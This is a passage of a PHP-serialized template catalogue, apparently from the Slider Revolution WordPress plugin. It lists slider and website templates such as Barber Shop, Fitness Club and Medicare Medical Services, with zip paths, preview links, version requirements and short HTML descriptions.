want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Barber Shop\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"16\";s:9:\"installed\";b:0;}i:256;a:25:{s:2:\"id\";s:3:\"265\";s:5:\"title\";s:20:\"Barber Shop Services\";s:5:\"alias\";s:20:\"barber-shop-services\";s:3:\"zip\";s:30:\"packs/barber-shop-services.zip\";s:3:\"uid\";s:32:\"d65121d6f84fabd812a2b621b768e10e\";s:3:\"img\";s:31:\"barber-shop-services/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/barber-shop-template-for-wordpress/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:220:\"<span class=\"ttm_content\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Barber Shop\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"16\";s:9:\"installed\";b:0;}i:257;a:25:{s:2:\"id\";s:3:\"266\";s:5:\"title\";s:19:\"Barber Shop Barbers\";s:5:\"alias\";s:19:\"barber-shop-barbers\";s:3:\"zip\";s:29:\"packs/barber-shop-barbers.zip\";s:3:\"uid\";s:32:\"003e9fec9693072119c8f8d8b6690c4d\";s:3:\"img\";s:30:\"barber-shop-barbers/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/barber-shop-template-for-wordpress/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:220:\"<span class=\"ttm_content\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Barber Shop\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"16\";s:9:\"installed\";b:0;}i:258;a:25:{s:2:\"id\";s:3:\"267\";s:5:\"title\";s:20:\"Barber Shop Contacts\";s:5:\"alias\";s:20:\"barber-shop-contacts\";s:3:\"zip\";s:30:\"packs/barber-shop-contacts.zip\";s:3:\"uid\";s:32:\"cdcc08f5d6c90dbcfd0502bda2401643\";s:3:\"img\";s:31:\"barber-shop-contacts/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/barber-shop-template-for-wordpress/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:220:\"<span class=\"ttm_content\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Barber Shop\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"16\";s:9:\"installed\";b:0;}i:259;a:25:{s:2:\"id\";s:3:\"268\";s:5:\"title\";s:18:\"Barber Shop Footer\";s:5:\"alias\";s:18:\"barber-shop-footer\";s:3:\"zip\";s:28:\"packs/barber-shop-footer.zip\";s:3:\"uid\";s:32:\"26ca5ae0de7cdbb2ca19348b6e01eda0\";s:3:\"img\";s:29:\"barber-shop-footer/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/barber-shop-template-for-wordpress/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:220:\"<span class=\"ttm_content\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Barber Shop\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"16\";s:9:\"installed\";b:0;}i:260;a:22:{s:2:\"id\";s:3:\"269\";s:5:\"title\";s:12:\"Fitness Club\";s:5:\"alias\";s:21:\"fitness-club-template\";s:3:\"zip\";s:25:\"fitness-club-template.zip\";s:3:\"uid\";s:32:\"14ea10d68d6aad1df62b3becf71df754\";s:3:\"img\";s:32:\"fitness-club-template/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/fitness-club-header-for-wordpress/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:223:\"<span class=\"ttm_content\">The Fitness Club Header is the perfect introduction to your fitness themed website. Showcase your current offers or service portfolio with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:261;a:22:{s:2:\"id\";s:3:\"270\";s:5:\"title\";s:13:\"Soccer School\";s:5:\"alias\";s:13:\"soccer-school\";s:3:\"zip\";s:17:\"soccer-school.zip\";s:3:\"uid\";s:32:\"9906b48812aff67097f990eeee42dd41\";s:3:\"img\";s:24:\"soccer-school/slide1.jpg\";s:7:\"preview\";s:67:\"https://revolution.themepunch.com/soccer-club-slider-for-wordpress/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:228:\"<span class=\"ttm_content\">The Soccer Club Header is the perfect introduction to your Soccer School themed website. Showcase your current offers or service portfolio with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:163:\"[{\"path\":\"revslider-revealer-addon\\/revslider-revealer-addon.php\",\"name\":\"Reveal AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:262;a:22:{s:2:\"id\";s:3:\"271\";s:5:\"title\";s:10:\"Music Band\";s:5:\"alias\";s:19:\"music-band-template\";s:3:\"zip\";s:23:\"music-band-template.zip\";s:3:\"uid\";s:32:\"91e79657bf1b1812f8114a00ab8e0eb4\";s:3:\"img\";s:30:\"music-band-template/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/music-band-template-for-wordpress/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:7:\"5.4.8.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:221:\"<span class=\"ttm_content\">The Music Band Header is the perfect introduction to your Music Band themed website. Showcase your current songs, albums and videos with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:163:\"[{\"path\":\"revslider-revealer-addon\\/revslider-revealer-addon.php\",\"name\":\"Reveal AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:263;a:22:{s:2:\"id\";s:3:\"272\";s:5:\"title\";s:15:\"Restaurant Menu\";s:5:\"alias\";s:15:\"restaurant-menu\";s:3:\"zip\";s:19:\"restaurant-menu.zip\";s:3:\"uid\";s:32:\"078809cffb21b6c4d3f5aaa2daeb193d\";s:3:\"img\";s:26:\"restaurant-menu/slide1.jpg\";s:7:\"preview\";s:71:\"https://revolution.themepunch.com/restaurant-menu-slider-for-wordpress/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.4.8.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:208:\"<span class=\"ttm_content\">The Restaurant Menu Header is the perfect introduction to your Restaurant themed website. Showcase your current dishes with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:264;a:22:{s:2:\"id\";s:3:\"273\";s:5:\"title\";s:16:\"Cinematic Slider\";s:5:\"alias\";s:16:\"cinematic-slider\";s:3:\"zip\";s:20:\"cinematic-slider.zip\";s:3:\"uid\";s:32:\"c53e7dcbb6b656ae7b4c91d333589838\";s:3:\"img\";s:27:\"cinematic-slider/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/cinematic-slider-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:138:\"<span class=\"ttm_content\">Bold texts and a cinematic transition effect make this slider stand out!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:265;a:22:{s:2:\"id\";s:3:\"274\";s:5:\"title\";s:17:\"3D Parallax Cubes\";s:5:\"alias\";s:17:\"3d-parallax-cubes\";s:3:\"zip\";s:21:\"3d-parallax-cubes.zip\";s:3:\"uid\";s:32:\"c5b809a1829f8f809c9a768cd3d6b3cb\";s:3:\"img\";s:28:\"3d-parallax-cubes/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/3d-parallax-cubes-slider-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:149:\"<span class=\"ttm_content\">This amazing 3D cubes parallax effect can be an eye-opening intro for your website!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:266;a:25:{s:2:\"id\";s:3:\"275\";s:5:\"title\";s:33:\"Medicare Medical Services Website\";s:5:\"alias\";s:33:\"medicare-medical-services-website\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:41:\"medicare-medical-services-website-package\";s:3:\"img\";s:29:\"packages/medicare_package.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/medicare-medical-services-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:163:\"<span class=\"ttm_content\">The Medicare Medical Services template is a great solution for your medical practice or hospital.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Medicare Medical Services\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"17\";s:9:\"installed\";b:0;}i:267;a:25:{s:2:\"id\";s:3:\"276\";s:5:\"title\";s:13:\"Medicare Menu\";s:5:\"alias\";s:13:\"medicare-menu\";s:3:\"zip\";s:23:\"packs/medicare-menu.zip\";s:3:\"uid\";s:32:\"0e4ca8fc281e20251b3fffa19d470fed\";s:3:\"img\";s:24:\"medicare-menu/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/medicare-medical-services-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:163:\"<span class=\"ttm_content\">The Medicare Medical Services template is a great solution for your medical practice or hospital.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Medicare Medical Services\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"17\";s:9:\"installed\";b:0;}i:268;a:25:{s:2:\"id\";s:3:\"277\";s:5:\"title\";s:15:\"Medicare Header\";s:5:\"alias\";s:15:\"medicare-header\";s:3:\"zip\";s:25:\"packs/medicare-header.zip\";s:3:\"uid\";s:32:\"03e8ade247d8c96f548bc0515f34043f\";s:3:\"img\";s:26:\"medicare-header/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/medicare-medical-services-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:163:\"<span class=\"ttm_content\">The Medicare Medical Services template is a great solution for your medical practice or hospital.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Medicare Medical Services\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"17\";s:9:\"installed\";b:0;}i:269;a:25:{s:2:\"id\";s:3:\"278\";s:5:\"title\";s:14:\"Medicare About\";s:5:\"alias\";s:14:\"medicare-about\";s:3:\"zip\";s:24:\"packs/medicare-about.zip\";s:3:\"uid\";s:32:\"a3ab9e89155ef2542820343f30b29f72\";s:3:\"img\";s:25:\"medicare-about/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/medicare-medical-services-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:163:\"<span class=\"ttm_content\">The Medicare Medical Services template is a great solution for your medical practice or hospital.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Medicare Medical Services\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"17\";s:9:\"installed\";b:0;}i:270;a:25:{s:2:\"id\";s:3:\"279\";s:5:\"title\";s:18:\"Medicare Highlight\";s:5:\"alias\";s:18:\"medicare-highlight\";s:3:\"zip\";s:28:\"packs/medicare-highlight.zip\";s:3:\"uid\";s:32:\"c3c8a74e5402489f1a85a0c83890ef1f\";s:3:\"img\";s:29:\"medicare-highlight/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/medicare-medical-services-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:163:\"<span class=\"ttm_content\">The Medicare Medical Services template is a great solution for your medical practice or hospital.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Medicare Medical Services\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"17\";s:9:\"installed\";b:0;}i:271;a:25:{s:2:\"id\";s:3:\"280\";s:5:\"title\";s:17:\"Medicare Services\";s:5:\"alias\";s:17:\"medicare-services\";s:3:\"zip\";s:27:\"packs/medicare-services.zip\";s:3:\"uid\";s:32:\"8869b0834d4649dcc3221bed65980806\";s:3:\"img\";s:28:\"medicare-services/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/medicare-medical-services-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:163:\"<span class=\"ttm_content\">The Medicare Medical Services template is a great solution for your medical practice or hospital.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Medicare Medical Services\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"17\";s:9:\"installed\";b:0;}i:272;a:25:{s:2:\"id\";s:3:\"281\";s:5:\"title\";s:16:\"Medicare Doctors\";s:5:\"alias\";s:16:\"medicare-doctors\";s:3:\"zip\";s:26:\"packs/medicare-doctors.zip\";s:3:\"uid\";s:32:\"2c9d57afd64244b5f7e30b0d87c842f9\";s:3:\"img\";s:27:\"medicare-doctors/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/medicare-medical-services-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:163:\"<span class=\"ttm_content\">The Medicare Medical Services template is a great solution for your medical practice or hospital.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Medicare Medical Services\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"17\";s:9:\"installed\";b:0;}i:273;a:25:{s:2:\"id\";s:3:\"282\";s:5:\"title\";s:17:\"Medicare Research\";s:5:\"alias\";s:17:\"medicare-research\";s:3:\"zip\";s:27:\"packs/medicare-research.zip\";s:3:\"uid\";s:32:\"31e84a91fc8b8d5296e715e539a076d0\";s:3:\"img\";s:28:\"medicare-research/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/medicare-medical-services-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:163:\"<span class=\"ttm_content\">The Medicare Medical Services template is a great solution for your medical practice or hospital.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Medicare Medical Services\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"17\";s:9:\"installed\";b:0;}i:274;a:25:{s:2:\"id\";s:3:\"283\";s:5:\"title\";s:19:\"Medicare Why 